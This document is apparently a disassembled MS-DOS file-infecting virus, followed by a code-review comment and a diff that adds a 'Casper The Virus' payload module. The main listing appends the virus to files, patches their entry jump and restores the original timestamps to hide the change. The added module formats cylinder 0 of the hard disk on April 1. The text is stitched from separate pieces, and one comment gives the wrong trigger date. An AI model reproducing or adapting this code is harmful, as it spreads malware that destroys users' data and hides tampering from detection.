int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
jc loc_11 ; Jump if carry Set
mov word ptr cs:[2B0h],ds
mov word ptr cs:[2B2h],dx
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_11 ; Jump if carry Set
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get file date+time, bx=handle
; returns cx=time, dx=time
mov word ptr cs:[2ACh],cx
mov word ptr cs:[2AEh],dx
jmp short loc_12
nop
loc_10:
jmp loc_6
loc_11:
jmp loc_16
loc_12:
mov cx,3
mov ax,cs
mov ds,ax
mov es,ax
mov dx,2B6h
mov ax,3F00h
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
mov cx,0
mov dx,word ptr cs:[2B7h]
add dx,3
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov cx,0Ah
mov dx,29Bh
mov ax,3F00h
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
cld ; Clear direction
mov cx,0Ah
mov si,29Bh
mov di,data_16e
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jz loc_15 ; Jump if zero
mov ax,4202h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
cmp ax,6A4h
jb loc_15 ; Jump if below
jmp short loc_14
nop
loc_13:
jmp short loc_10
loc_14:
mov cx,cs:data_18e
and cx,0Fh
add cx,5
mov ax,cs
mov ds,ax
xor dx,dx ; Zero register
mov ax,4000h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jc loc_15 ; Jump if carry Set
mov ax,4202h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
sub ax,3
mov word ptr cs:[2AAh],ax
xor dx,dx ; Zero register
mov ax,4000h
mov cx,2BBh
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jc loc_15 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov ax,cs
mov ds,ax
mov dx,2A9h
mov ax,4000h
mov cx,3
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_15:
mov ax,5701h
mov cx,word ptr cs:[2ACh]
mov dx,word ptr cs:[2AEh]
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
mov ax,3E00h
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
mov ds,word ptr cs:[2B0h]
mov dx,word ptr cs:[2B2h]
mov cx,word ptr cs:[2B4h]
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
loc_16:
pop di
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmp short loc_13
nop
add [bx+si],al
push ax
mov ah,30h ; '0'
int 21h ; DOS Services ah=function 30h
; get DOS version number ax
cmp ax,1E03h
;* je loc_17 ; Jump if equal
db 74h, 09h
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
stosb ; Store al to es:[di]
;* jmp loc_18
db 0E9h, 15h, 00h
test ax,3AA5h
push ss
db 0FEh,0B2h,0B9h, 41h, 20h, 00h
db 0B8h, 00h, 4Ch, 02h, 00h
seg_a ends
end start
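Review bot: The generated comments on the two `int 21h` function 57h calls read `cx=time, dx=time`, which is wrong for the second register: DOS returns and takes the file date in `dx`. Both should read `cx=time, dx=date` (after `mov ax,5700h` and again at `loc_15` after `mov ax,5701h`), because the save/restore of the original timestamp is exactly what makes a modified file look untouched to a date-based check. Separately, the interrupt path under `loc_3` pushes `bp` and `ax` but pops `ax`, `ds` and `bp`, and the line `add [bp+si+7Dh],dh` sits where a frame setup would be expected, so that stretch looks like bytes decoded at the wrong offset. A `; NOTE: decode suspect, verify against the binary` comment would stop readers trusting it.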
@@ -0,0 +1,33 @@
;****************************************************************************
;*
;* UTILITY.ASM - Manipulation Task Code For Casper The Virus. *
;* *
;* USAGE: Is automatically INCLUDED in the assembly of casper.asm *
;* *
;* DETAILS: Date Activated Hard Disk Destroyer. *
;* DATE: 1st April DAMAGE: Formats Cylinder 0 of HD. *
;* *
;**************************************************************************
mov ah,2ah ; DOS Get Date.
int 21h
cmp dx,0401h ; 5th May.
jne utilend
mov ax,0515h ;Format Cylinder, 15 Sectors.
mov ch,0 ;Cylinder 0.
mov dx,00 ;Head 0, Drive 80h.
mov es,dx ;Junk for address marks.
mov bx,0 ;Junk....
int 13h ;Do It!
int 20h ;Exit
utilend: jmp entry3
db "Hi! I'm Casper The Virus, And On April The 1st I'm "
db "Gonna Fuck Up Your Hard Disk REAL BAD! "
db "In Fact It Might Just Be Impossible To Recover! "
db "How's That Grab Ya! <GRIN>"
entry3: